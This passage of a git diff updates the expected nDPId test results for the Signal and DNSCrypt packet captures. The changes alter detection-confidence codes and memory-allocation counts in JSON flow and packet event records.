{"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247601,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051247603,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264090,"flow_last_seen":1569051264669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264091,"flow_last_seen":1569051264679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264093,"flow_last_seen":1569051264674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1569051264666,"flow_last_seen":1569051265237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17722,"flow_avg_l4_payload_len":466,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00663{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1569051247594,"flow_last_seen":1569051257495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3653,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1569051264073,"flow_last_seen":1569051267100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4493,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":265,"flow_first_seen":1569051267121,"flow_last_seen":1569051267601,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":198733,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","packets-captured":637,"packets-processed":637,"total-skipped-flows":0,"total-l4-payload-len":273842,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":19,"total-detection-updates":24,"total-updates":0,"current-active-flows":0,"total-active-flows":19,"total-idle-flows":19,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":137,"global_ts_msec":1569051267601} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 637/637 @@ -143,9 +143,9 @@ ~~ total active/idle flows...: 19/19 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5964644 bytes -~~ total memory freed........: 5964644 bytes -~~ total allocations/frees...: 118908/118908 +~~ total memory allocated....: 6098278 bytes +~~ total memory freed........: 6098278 bytes +~~ total allocations/frees...: 121670/121670 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1427 chars diff --git a/test/results/simple-dnscrypt.pcap.out b/test/results/simple-dnscrypt.pcap.out index 2b08c7aa3..339b56c11 100644 --- a/test/results/simple-dnscrypt.pcap.out +++ b/test/results/simple-dnscrypt.pcap.out @@ -4,9 +4,9 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491813284555,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284555,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PRVAAIAGMNDAqCunhncaGMQ5Abvf\/XrjAAAAAIACIAChWwAAAgQFtAEDAwgBAQQC"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491813284666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284666,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xDnBW87r3\/165IASchC\/iQAAAgQFHgEBBAIBAwMH"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491813284666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813284666,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPRZAAIAGMNvAqCunhncaGMQ5Abvf\/XrkwVvO7FAQAEBxlgAA"} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813284555,"flow_last_seen":1491813284694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1491813284694,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813284555,"flow_last_seen":1491813284804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1516,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1491813284804,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1491813284555,"flow_last_seen":1491813284819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6756,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1491813284819,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813284555,"flow_last_seen":1491813284694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1491813284694,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813284555,"flow_last_seen":1491813284804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1516,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1491813284804,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1491813284555,"flow_last_seen":1491813284819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6756,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1491813284819,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286275,"flow_last_seen":1491813286275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286275,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491813286275,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286275,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSdAAIAGML7AqCunhncaGMRNAbtYb9jbAAAAAIACIADK3QAAAgQFtAEDAwgBAQQC"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286392,"flow_last_seen":1491813286392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286392,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -15,23 +15,23 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1491813286393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286393,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSlAAIAGMLzAqCunhncaGMRTAbtepcAHAAAAAIACIADddQAAAgQFtAEDAwgBAQQC"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491813286463,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286463,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xE3jDV\/XWG\/Y3IASchA2bgAAAgQFHgEBBAIBAwMH"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491813286463,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286463,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSpAAIAGMMfAqCunhncaGMRNAbtYb9jc4w1f2FAQAEDoegAA"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286275,"flow_last_seen":1491813286464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286464,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286275,"flow_last_seen":1491813286464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286464,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1491813286470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286470,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADUGuOWGdxoYwKgrpwG7xFOF+CiKXqXACIASchDdaAAAAgQFHgEBBAIBAwMH"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1491813286470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286470,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSxAAIAGMMXAqCunhncaGMRTAbtepcAIhfgoi1AQAECPdQAA"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286393,"flow_last_seen":1491813286470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286470,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286393,"flow_last_seen":1491813286470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286470,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1491813286489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286489,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xFKVdKj9XuwOhIASchD+twAAAgQFHgEBBAIBAwMH"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1491813286489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286489,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPS5AAIAGMMPAqCunhncaGMRSAbte7A6ElXSo\/lAQAECwxAAA"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286392,"flow_last_seen":1491813286491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286491,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 